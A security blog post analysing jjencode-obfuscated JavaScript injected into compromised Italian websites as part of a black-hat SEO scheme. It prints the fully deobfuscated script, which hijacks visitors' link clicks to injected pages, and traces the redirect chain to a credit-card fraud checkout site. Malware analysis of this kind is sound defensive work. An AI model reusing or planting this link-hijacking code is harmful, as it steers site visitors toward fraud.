dollars javascript code – yet another Javascript obfuscation method for cc frauds

January 25,  2011 – Update:
a detailed analysis also where is reported my post:
Internet  Explorer exSploit Milk codes
http://utf-8.jp/public/20101106/avtokyo.pptx

October 5, 2010:
From MDL forum, I get a post where a user (many thanks to Edgar) has been reported a strange Javascript code injected in some Italian web site. Specifically the message is located at the following URL:
 http://www.malwaredomainlist.com/forums/index.php?topic=4354.0
The code that is reported looks like shown in the following screenshot:

At first lookup appears like a nonsense code for who is not a Javascript guru like me. So I decide to try to decode this very interesting code for try to know what this code do.  The first step it’s been try to use some Javascript alert() function call in the prologue code. So  the first lines of code are been modified as following:
The blue pills shown the place where the alert() has been placed. Trying to execute this abstract of code the alert call sequence has generated these results:





The rest of code deobfuscation is obtained placing within a textarea the code referenced by “Function()” as follow:

also the end of obfuscated code must be modified as shown:
Once this modified code is placed in a test HTML page and rendered by Firefox, it’s been obtained this deobfuscated jquery code:

page_links = [];         function setGlobalOnLoad(f) {            var root = window.addEventListener || window.attachEvent ? window : document.addEventListener ? document : null            if (root){               if(root.addEventListener) root.addEventListener("load", f, false)               else if(root.attachEvent) root.attachEvent("onload", f)            } else {               if(typeof window.onload == 'function') {                  var existing = window.onload                  window.onload = function() {                     existing()                     f()                  }               } else {                  window.onload = f               }            }         }         function addHandler(object, event, handler) {           if (typeof object.addEventListener != 'undefined')             object.addEventListener(event, handler, false);           else if (typeof object.attachEvent != 'undefined')             object.attachEvent('on' + event, handler);         }         if (window.navigator.userAgent.match(/gtb/i) || window.navigator.userAgent.match(/chrome/i) || document.referrer!='' || document.referrer.indexOf (document.domain)==-1) {             var right_browser='yes';             }else     var right_browser='no';         function getCookie(c_name)         {         if (document.cookie.length>0)           {           c_start=document.cookie.indexOf(c_name + "=");           if (c_start!=-1)             {             c_start=c_start + c_name.length+1;             c_end=document.cookie.indexOf(";",c_start);             if (c_end==-1) c_end=document.cookie.length;             return unescape(document.cookie.substring(c_start,c_end));             }           }         return "";         }         var c_index = Math.floor(Math.random() * 5);                var fcoo=getCookie('c_first');                var exdate=new Date();         exdate.setDate(exdate.getDate()+365);         document.cookie='c_first'+ "=" +escape('false')+";expires="+exdate.toUTCString();         if (c_index==4 && fcoo!='false' && right_browser=='yes') {             setGlobalOnLoad(function() {             var block = document.getElementById('mlk');             var links = block.getElementsByTagName('A');             for (var i = 0; i < links.length; i++) {                 page_links.push(links[i].href);             }             var links = document.links;             for (var i = 0; i < links.length; i++) {                 addHandler(links[i], "click", function(event) {                     var index = Math.floor(Math.random() * (page_links.length - 1));                     event.target.href = page_links[index];                 });             }         });

Update: the code it’s been obuscated using the following encoding script:
http://utf-8.jp/public/jjencode.html  (Mowab thank you very much for your support).
The obtained code, at first sight seems a loader of the href object injected in the compromised web page (as shown along). Also the bolded line of code:
var block = document.getElementById('mlk');
is the object assignment which contain the link to the malicious HTML page injected within the compromised hosts. In particular all server listed and reported by the MDL post seems reference URL like these:
The HTML page injected lead to a to a black listed site as credit card fraud. In this case the compromised host analyzed is bisteccheriadabaffo.it. Calling , for example,
bisteccheriadabaffo.it/modules/com_easycaptcha/desert-highlands-golf-p-699.html
is retrieved this page:
Clicking on one of the download buttons appear a CAPTCHA request as following:
Clicking on download button is called the following URL:
hzzzzp://turbo-speed-downloads.com/download.php?file=1506495%20Cranberry%20Highlands%20Golf%20Course%20gsm%20userschoise%2097%20302.rar

Following the download sequence appear a message that entice the user to signup for download the desired file:
Trying to sign up, is shown a fake promotional message like this:

The checkout action try to contact this website
hxxxxps://purchase.shopeasydeals.com/
that is black listed for credit card frauds as noticed by MyWOT  response
http://www.mywot.com/en/scorecard/purchase.shopeasydeals.com
I think that the compromised hosts , as reported at the begin of this post, have been implicated for a Black Hat Seo infrastructure with the goal of enticing users to download stuff from a credit card fraud web site.